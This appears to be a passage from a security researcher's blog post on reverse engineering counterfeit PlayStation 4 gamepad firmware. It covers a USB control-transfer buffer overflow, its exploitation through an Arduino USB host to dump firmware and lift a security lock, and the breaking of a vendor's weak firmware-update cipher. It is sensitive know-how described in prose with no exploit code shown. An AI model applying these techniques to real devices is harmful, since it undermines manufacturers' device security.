There was an interesting discussion on Reddit where people were saying that it worked just like other unauthorized gamepads but only for eight minutes, but that the developers had managed to fix this with a firmware update. The store included a link to the firmware update and a manual.

Firmware update manual for Gator Claw

Basics of embedded firmware analysis

The first thing I did was to take a look at the resource section of the firmware updater executable.

Firmware found in resources of Gator Claw’s firmware updater

Readers who are familiar with writing code for embedded devices will most likely recognize this file format. This is an Intel HEX file format which is commonly used for programming microcontrollers, and many compilers (for example GNU Compiler) may output compiled code in this format. Also, we can see that the beginning of the firmware doesn’t have high entropy and sequences of bytes are easily recognizable. That means the firmware is not encrypted or compressed. After decoding the firmware from Intel HEX format and loading in hex editor (010 Editor is able to open files directly in that format) we are able to take a look at it. What architecture is it compiled for? ARM Cortex-M is so widely adopted that I recognize it straight away.

Gator Claw’s firmware (left) and vector table of ARM Cortex-M (right)

According to the specifications, the first double word is the initial stack pointer and after that comes the table of exception vectors. The first double word in this table is Reset vector that is used as the firmware entry point. The high addresses of other exception handlers give an idea of the firmware’s base address.

Besides firmware, the resource section of the firmware updater also contained a configuration file with a description of different microcontrollers. The developers of the firmware updater most probably used publicly available source code from the manufacturers of microcontrollers, which would explain why this configuration file came with source code.

Configuration file with description of different microcontrollers

After searching the microcontroller identificators from the config file, we found the site of the manufacturer – Nuvoton. Product information among technical documentation and the SDK is freely available for download without any license agreements.

The site of the Nuvoton microcontroller manufacturer

At this point we have the firmware, we know its architecture and microcontroller manufacturer, and we have information about the base address, initial stack pointer and entry point. We have more information than we actually need to load the firmware in IDA Pro and start analyzing it.

ARM processors have two different instruction sets: ARM (32 bit instructions) and Thumb (16-bit instructions extended with Thumb-2 32-bit instructions). Cortex-M0 supports only Thumb mode so we will switch the radio button in “Processor options – Edit ARM architecture options – Set ARM instructions” to “NO” when loading the firmware in IDA Pro.

After that we can see the firmware has loaded at base address 0 and automatic analysis has recognized almost every function. The question now is how to move forward with the reverse engineering of the firmware?

Example of one of the many firmware functions

If we analyze the firmware, we’ll see that throughout it performs read and write operations to memory with the base address 0x40000000. This is the base address of memory mapped input output (MMIO) registers. These MMIO registers allow you to access and control all the microcontroller’s peripheral components. Everything that the firmware does happens through access to them.

Memory map of peripheral controllers

By searching through the technical documentation for the address 0x40000000 we find that this microcontroller belongs to the M451 family. Now that we know the family of the microcontroller, we are able to download the SDK and code samples for this platform. In the SDK we find a header file with a definition of all MMIO addresses, bit fields and structures. We can also compile code samples with all the libraries and compare them with functions in our IDB, or we can look for the names of the MMIO addresses in the source code and compare it with our disassembly. This makes the process of reverse engineering straightforward. That’s because we know the architecture and model of the microcontroller and we have a definition of all MMIO registers. Analysis would be much more complicated if we didn’t have this information. It’s fair to say that is why many vendors only distribute the SDK after an NDA is signed.

Finding library functions in the firmware

In the shadow of colossus

I analyzed Gator Claw’s firmware while waiting for my fake gamepad to arrive. There wasn’t much of interest inside – authentication data is sent to another microcontroller accessible over I2C and the response is sent back to the console. The developers of this unlicensed gamepad knew that this firmware may be reverse engineered and the existence of more counterfeit gamepads may hurt their business. To prevent this, another microcontroller was used for the sole purpose of keeping secrets safe. And this is common practice. The hackers put a lot of effort into their product and don’t want to be hacked too. What really caught my attention in this firmware was the presence of some seemingly unused string. Most likely it was meant to be part of a USB Device Descriptor but that particular descriptor was left unused. Was this string left on purpose? Is it some kind of signature? Quite probably, because this string is the name of a major hardware manufacturer best known for their logic analyzers. But it also turns out they have a gaming division that aims to be an original equipment manufacturer (OEM) and even has a number of patents related to the production of gaming accessories. Besides that, they also have subsidiary and their site has huge assortment of gaming accessories sold under a single brand. Among the products on sale are two dozen adapters that allow the gamepads of one console to be used with another console. For example, there’s one product that lets you connect the gamepad of an Xbox 360 to PlayStation 4, another product that lets you connect a PlayStation 3 gamepad to Xbox One, and so on, including a universal ‘all in one’. The list of products also includes adapters that allow you to connect a PC mouse and keyboard to the PS4, Xbox One and Nintendo Switch video game consoles, various gamepads and printed circuit boards to create your own arcade controllers for gaming consoles. All the products come with firmware updaters similar to the one that was provided for Gator Claw, but with one notable difference – all the firmware is encrypted.

Example of manual and encrypted firmware from resources for one of the products

The printed circuit boards for creating your own arcade controllers let you take a look at PCB design without buying a device and taking it apart. Their design is most likely very close to that of Gator Claw. We can see two microcontrollers; one of them should be Nuvoton M451 and the other is an additional microcontroller to store secrets. All traces go to the microcontroller under black epoxy, so it should be the main microcontroller, and the microcontroller with the four yellow pins seems to have what’s required to work over I2C.

Examples of product PCB design


By this time I had finally received my parcel from Shenzhen and this is what I found inside. I think you’ll agree that the counterfeit gamepad looks exactly like the original DualShock 4. And it feels like it too. It’s a wireless gamepad made with good quality materials and has a working touch pad, speaker and headset port.

Counterfeit DualShock 4 (from the outside)

I pressed one of the combinations found in the update instructions and powered it on. The gamepad booted into DFU mode! After connecting the gamepad to a PC in this mode it was recognized as another device with different identifiers and characteristics. I already knew what I was going to see inside…

Counterfeit DualShock 4 (view of main PCB)

I soldered a few wires to what looked like JTAG points and connected it to a JTAG programmer. The programming tool recognized the microcontroller, but a Security Lock was set.

Programming tool recognized microcontroller but Security Lock was enabled

Hacking microcontroller firmware through a USB

After this rather lengthy introduction, it’s now time to return to the main subject of this article. USB (Universal Serial Bus) is an industry standard for peripheral devices. It’s designed to be very flexible and allow a wide range of applications. USB protocol defines two entities – one host to whcih other devices connect. USB devices are divided into classes such as hub, human interface, printer, imaging, mass storage device and others.

Connection scheme of USB devices

Data and control exchange between the devices with the host happens through a set of uni-directional or bi-directional pipes. By pipes we consider data transfers between host software and a particular endpoint on a USB device. One device may have many different endpoints to exchange different types of data.

Data transfer types

There are four different types of data transfers:

  • Control Transfers (used to configure a device)
  • Bulk Data Transfers (generated or consumed in relatively large and bursty quantities)
  • Interrupt Data Transfers (used for timely but reliable delivery of data)
  • Isochronous Data Transfers (occupy a prenegotiated amount of USB bandwidth with a prenegotiated delivery latency)

All USB devices must support a specially designated pipe at endpoint zero to which the USB device’s control pipe will be attached.

Those types of data transfers are implemented with the use of packets provided according to the scheme below.

Packets used in USB protocol

In fact, USB protocol is a state machine and in this article we are not going to examine all those packets. Below you can see an example of the packets used in a Control Transfer.

Control Transfer

USB devices may contain vulnerabilities when implementing Bulk Transfers, Interrupt Transfers, Isochronous Transfers, but those types of data transfers are optional and their presence and usage will vary from target to target. But all USB devices support Control Transfers. Their format is common and this makes this type of data transfer the most attractive to analyze for vulnerabilities.

The scheme below shows the format of the SETUP packet used to perform a Control Transfer.

Format of SETUP packet

The SETUP packet occupies 8 bytes and it can be used to obtain different types of data depending on the type of request. Some requests are common for all devices (for example GET DESCRIPTOR); others depend on the class of device and manufacturer permission. The length of data to send or receive is a 16-bit word provided in the SETUP packet.

Examples of standard and class-specific requests

Summing up: Control Transfers use a very simple protocol that’s supported by all USB devices. It can have lots of additional requests and we can control the size of data. All of that makes Control Transfers a perfect target for fuzzing and glitching.


To hack my counterfeit gamepad I didn’t have to fuzz it because I found vulnerabilities while I was looking at the Gator Claw code.

Vulnerable code in handler of HID class requests

Function HID_ClassRequest() is present to emulate the work of the original DualShock 4 gamepad and implements the bare minimum of required requests to get it working with PlayStation 4. USBD_GetSetupPacket() gets the SETUP packet and depending on the type of report it will either send data with the function USBD_PrepareCntrlIn() or will receive with the function USBD_PrepareCntrlOut(). This function doesn’t check the length of the requested data and this should allow us to read part of the internal Flash memory where the firmware is located and also read and write to the beginning of SRAM memory.

Buffer overflow during Control Transfer

The size of the DATA packet is defined in the USB Device Descriptor (also received with the Control Transfer), but what seems to be left unnoticed is the fact that this size defines the length of a single packet and there may be lots of packets depending on the length set in the SETUP packet.

It is noteworthy that the code samples provided on the site of Nuvoton also don’t have checks for length and it could lead to the spread of similar bugs in all products that used this code as a reference.

Exploitation of buffer overflow in SRAM memory

SRAM (static random access memory) is a memory that among other things is occupied by stack. SRAM is often also executable memory (this is configurable). This is usually done to increase performance by making firmware copy pieces of code that are often called (for example, Real-Time Operating System) to SRAM. There is no guarantee that the top of the stack will be reachable by buffer overflow, but the chances of that are nevertheless high.

Surprisingly, the main obstacle to exploiting USB firmware is the operating system. The following was observed while I was working with Windows, but I think most of it also applies to Linux without special patches.

First of all, the operating system doesn’t let you read more than 4 kb during a Control Transfer. Secondly, in my experience the operating system doesn’t let you write more than a single DATA packet during a Control Transfer. Thirdly, the USB device may have hidden requests and all attempts to use them will be blocked by the OS.

This is easy to demonstrate with human interface devices (HID), including gamepads. HIDs come with additional descriptors (HID Descriptor, Report Descriptor, Physical Descriptor). A Report Descriptor is quite different from the other descriptors and consists of different items that describe supported reports. If a report is missing from Report Descriptor, then the OS will refuse to complete it, even if it’s handled in the device. This basically detracts from the discovery and exploitation of vulnerabilities in the firmware of USB devices and those nuances most probably prevented the discovery of vulnerabilities in the past.

To solve this problem without having to read and recompile the sources of the Linux kernel, I just used low end instruments that I had available at hand: Arduino Mega board and USB Host Shield (total < $30).

Connection scheme

After connecting devices with the above scheme, I used the Arduino board to perform a Control Transfer without any interference from the operating system.

Arduino Mega + USB Host Shield

The counterfeit gamepad had the same vulnerabilities as Gator Claw and the first thing I did was to dump part of the firmware.

Partial dump of firmware

The easiest way to find the base address of the firmware dump is to find a structure with pointers to known data. After that we can calculate the delta of addresses and load a partial dump of the firmware to IDA Pro.

Structure with pointers to known data

The firmware dump allowed us to find out the address of the printf() function that outputs the information in UART required for factory quality assurance. More than that, I was able to find the hexdump() function in the dump, meaning I didn’t even need to write shellcode.

Finding functions that aid exploitation

After locating the UART points on the printed circuit board of the gamepad, soldering wires and connecting them to a TTL2USB adapter, we can see the output in a serial terminal.

Standard UART output during gamepad boot

A standard library for Nuvoton microcontrollers comes with a very handy handler of Hard Fault exceptions that outputs a register dump. This greatly facilitates in exploitation and allows exploits to be debugged.

UART output after Hard Fault exception caused by stack overwrite

A final exploit to dump firmware can be seen in the screenshot below.

Exploit and shellcode to dump firmware over UART

But this way to dump firmware is not perfect because the microcontrollers of the Nuvoton M451 family may have two different types of firmware – main firmware (APROM) and mini-firmware for device firmware update (LDROM).

Memory map of flash memory and system memory in different modes

APROM and LDROM are mapped at the same memory addresses and because of that it’s only possible to dump one of them. To get a dump of LDROM firmware we need to disable the security lock and read the flash memory with a programming tool.

Shellcode that disables security lock

Crypto fail

Analysis of the firmware responsible for updates (LDROM) revealed that it’s mostly standard code from Nuvoton, but with added code to decrypt firmware updates.

Cryptographic algorithm scheme for decryption of firmware updates

The cryptographic algorithm used for decrypting firmware updates is a custom block cipher. It is performed in cipher block chaining mode, but the block size is just 32 bits. This algorithm takes a key that is a textual (ascii) identificator of the product and array of instructions that define what transformation should be performed on the current block. After encountering the end of the key and array their current position is set to the initial position. The list of transformations includes six operations: xor, subtraction, subtraction (reverse), and the same operations but with the bytes swapped. Because the firmware contains large areas filled with zeroes, it makes it easy to calculate the secret parts of this algorithm.

Revealing the firmware update encryption key

Applying the algorithm extracted from the firmware of the counterfeit gamepad to all the firmware of the accessories found on the site of a major OEM manufacturer revealed that all of them use this encryption algorithm, and the weaknesses in this algorithm allowed us to calculate the encryption keys for all devices and decrypt their firmware updates. In other words, the algorithm used inside the counterfeit product led to the security of all the products developed by that manufacturer being compromised.


This blog post turned out to be quite long, but I really wanted to prepare it for a very wide audience. I have given a step-by-step guide on the analysis of embedded firmware, finding vulnerabilities and exploiting them to acquire a firmware dump and to carry out code execution on a USB device.

The subject of glitching attacks is not included in the scope of this article, but such attacks are also very effective against USB devices. For those who want to learn more about them, I recommend watching this video. For those wondering how pirates managed to acquire the algorithm and key from DualShock 4 to make their own devices, I suggest reading this article.

As for the mystery of the auxiliary microcontroller that was used to keep secrets, I found out that it was not used in all devices and was only added for obscurity. This microcontroller doesn’t keep any secrets and is only used for SHA1 and SHA256. This research also aids enthusiasts to create their own open source projects for use with game consoles.

As for buyers of counterfeit gamepads, they are not in an enviable position because manufacturers block illegally used keys and the users end up without a working gamepad or hints on where to get firmware updates.